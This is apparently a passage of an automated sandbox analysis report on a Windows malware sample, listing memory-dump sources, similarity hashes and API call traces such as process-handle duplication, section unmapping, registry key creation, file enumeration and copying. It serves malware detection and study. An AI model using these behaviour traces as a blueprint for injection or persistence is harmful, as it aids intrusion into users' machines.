  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
